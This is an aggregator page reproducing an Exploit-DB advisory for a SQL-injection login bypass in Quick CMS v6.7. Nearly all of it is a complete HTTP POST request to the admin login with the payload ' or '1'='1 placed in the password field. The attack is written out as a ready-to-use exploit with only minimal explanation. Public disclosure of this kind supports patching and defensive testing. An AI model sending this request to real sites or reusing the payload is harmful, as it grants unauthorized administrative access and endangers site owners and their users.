6
[webapps] Quick CMS v6.7 en 2023 - 'password' SQLi
source link: https://www.exploit-db.com/exploits/51967
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Quick CMS v6.7 en 2023 - 'password' SQLi
# Title: Quick CMS v6.7 en 2023 - 'password' SQLi
# Author: nu11secur1ty
# Date: 03/19/2024
# Vendor: https://opensolution.org/
# Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
# Reference: https://portswigger.net/web-security/sql-injection
# Description: The password parameter is vulnerable for SQLi bypass authentication!
[+]Payload:
```mysql
POST /admin.php?p=login HTTP/1.1
Host: localpwnedhost.com
Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg
Content-Length: 92
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localpwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localpwnedhost.com/admin.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true
```
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK